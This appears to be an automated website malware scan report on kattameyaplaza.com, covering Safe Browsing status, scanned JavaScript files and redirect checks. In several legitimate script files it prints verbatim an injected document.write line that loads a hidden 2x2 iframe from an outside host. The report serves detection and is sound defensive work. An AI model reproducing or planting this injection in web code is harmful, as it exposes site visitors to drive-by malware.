Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kattameyaplaza.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.kattameyaplaza.com/ | 200 OK Content-Length: 6196 Content-Type: text/html | suspicious |
Hidden iFrame found. The same iFrame was found in 14 websites. size: 2x2 src: http://recoveryventurescorp.org/ozzi.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html> | ||
http://www.kattameyaplaza.com/includes/ext_mediaplayer.js | 200 OK Content-Length: 3342 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function insertFlash( strSrc, intWidth, intHeight, strWMode, strScale, strPlayMode, strCLSID, strCODEBASE, strBGcolor, strPosition, strFlashVars )
{ if(strWMode == null || strWMode == "") strWMode = "Opaque"; if(strScale == null || strScale == "") strScale = "noscale"; if(strPlayMode == null || strPlayMode == "") strPlayMode = "true"; var strFlash = '<object classid="' + strCLSID + '" codebase="' + strCODEBASE + '" '; strFlash += ' width="' + intWidt for(m=0; m<els.length; m++){ el=FP_getObjectByID(id,els[n]); if(el) return el; } } return null; } function FP_changePropRestore() { var d=document,x; if(d.$cpe) { for(i=0; i<d.$cpe.length; i++) { x=d.$cpe[i]; if(x.v=="") x.v=""; eval("x."+x.n+"=x.v"); } d.$cpe=null; } } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html></iframe>'); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 14 websites. size: 2x2 src: http://recoveryventurescorp.org/ozzi.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html> | ||
http://www.kattameyaplaza.com/includes/KattamyaPlaza.js | 200 OK Content-Length: 1911 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var timerN=null, NS4=false,NS6=false;
if(navigator.appName == "Netscape") { NN = true; navVer = parseInt(navigator.appVersion); if(navVer < 4) { NOT_SUPPORTED = true; } else if( navVer == 4) { NS4 = true; } else { NS6 = true; } } function openwin1(x,y,z) { var sWidth,sHeight,NS4; if (NS4) { sWidth = window.innerWidth - 14- y; sHeight=10; } else { sWidth = document.body.clientWidth - 18 - else document.all[levels].style.visibility = "visible"; } function hidelayer(levels) { if (NS6) { document.getElementById(levels).style.visibility = "hidden";} else if (NS4) document.layers[levels].visibility = "hide"; else document.all[levels].style.visibility = "hidden"; } document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html></iframe>'); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 14 websites. size: 2x2 src: http://recoveryventurescorp.org/ozzi.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html> | ||
http://www.kattameyaplaza.com/js/mootools-1.2.3-core-yc.js | 200 OK Content-Length: 66767 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var MooTools={version:"1.2.3",build:"4980aa0fb74d2f6eb80bcd9f5b8e1fd6fbb8f607"};var Native=function(k){k=k||{};var a=k.name;var i=k.legacy;var b=k.protect; var c=k.implement;var h=k.generics;var f=k.initialize;var g=k.afterImplement||function(){};var d=f||i;h=h!==false;d.constructor=Native;d.$family={name:"native"}; if(i&&f){d.prototype=i.prototype;}d.prototype.constructor=d;if(a){var e=a.toLowerCase();d.prototype.$family={name:e};Native.typize(d,e);}var j=function(n,l,o,m){if(!b }});Request.JSON=new Class({Extends:Request,options:{secure:true},initialize:function(a){this.parent(a);this.headers.extend({Accept:"application/json","X-Request":"JSON"}); },success:function(a){this.response.json=JSON.decode(a,this.options.secure);this.onSuccess(this.response.json,a);}}); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http: Antivirus reports:
Hidden iFrame found. The same iFrame was found in 14 websites. size: 2x2 src: http://recoveryventurescorp.org/ozzi.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html> | ||
http://www.kattameyaplaza.com/js/milkbox.js | 200 OK Content-Length: 26448 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Milkbox = new Class({ Implements:[Options,Events], options:{ overlayOpacity:0.7, topPosition:50, initialWidth:250, initialHeight:250, canvasBorderWidth:'0px', canvasBorderColor:'#000000', canvasPadding:'0px', resizeDuration:500, resizeTransition:'sine:in:out', autoPlay:false, autoPlayDelay:7, removeTitle:false, autoSize:true, maxHeight:0, imageOfText:'of', onXmlGalleries:$empty, onClos this.overlay.get('tween').cancel(); this.center.get('morph').cancel(); this.center.get('tween').cancel(); this.center.retrieve('setFinalHeight').cancel(); this.canvas.get('tween').cancel(); } }); window.addEvent('domready', function(){ milkbox = new Milkbox(); }); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html></iframe>'); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 14 websites. size: 2x2 src: http://recoveryventurescorp.org/ozzi.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html> | ||
http://www.kattameyaplaza.com/js/MooTools/mediaboxAdv.js | 200 OK Content-Length: 40771 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Mediabox; (function() { var options, images, activeImage, prevImage, nextImage, top, mTop, left, mLeft, winWidth, winHeight, fx, preload, preloadPrev = new Image(), preloadNext = new Image(), foxfix = false, iefix = false, overlay, center, image, bottom, captionSplit, title, caption, prevLink, number, nextLink, URL, WH, WHL, elrel, mediaWidth, mediaHeight, mediaType = "none", mediaSplit, mediaId = "mediaBox", mediaFmt; wind var rel0 = this.rel.replace(/[[]|]/gi," "); var relsize = rel0.split(" "); return (this == el); return (this == el) || ((this.rel.length > 8) && el.rel.match(relsize[1])); }); }; window.addEvent("domready", Mediabox.scanPage); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html></iframe>'); Antivirus reports:
Hidden iFrame found. The same iFrame was found in 14 websites. size: 2x2 src: http://recoveryventurescorp.org/ozzi.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recoveryventurescorp.org/ozzi.html> | ||
http://www.kattameyaplaza.com/test404page.js | 404 Not Found Content-Length: 300 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kattameyaplaza.com
Result:
GET / HTTP/1.1
Host: kattameyaplaza.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: kattameyaplaza.com
Referer: http://www.google.com/search?q=kattameyaplaza.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kattameyaplaza.com
Referer: http://www.google.com/search?q=kattameyaplaza.com
Result:
The result is similar to the first query. There are no suspicious redirects found.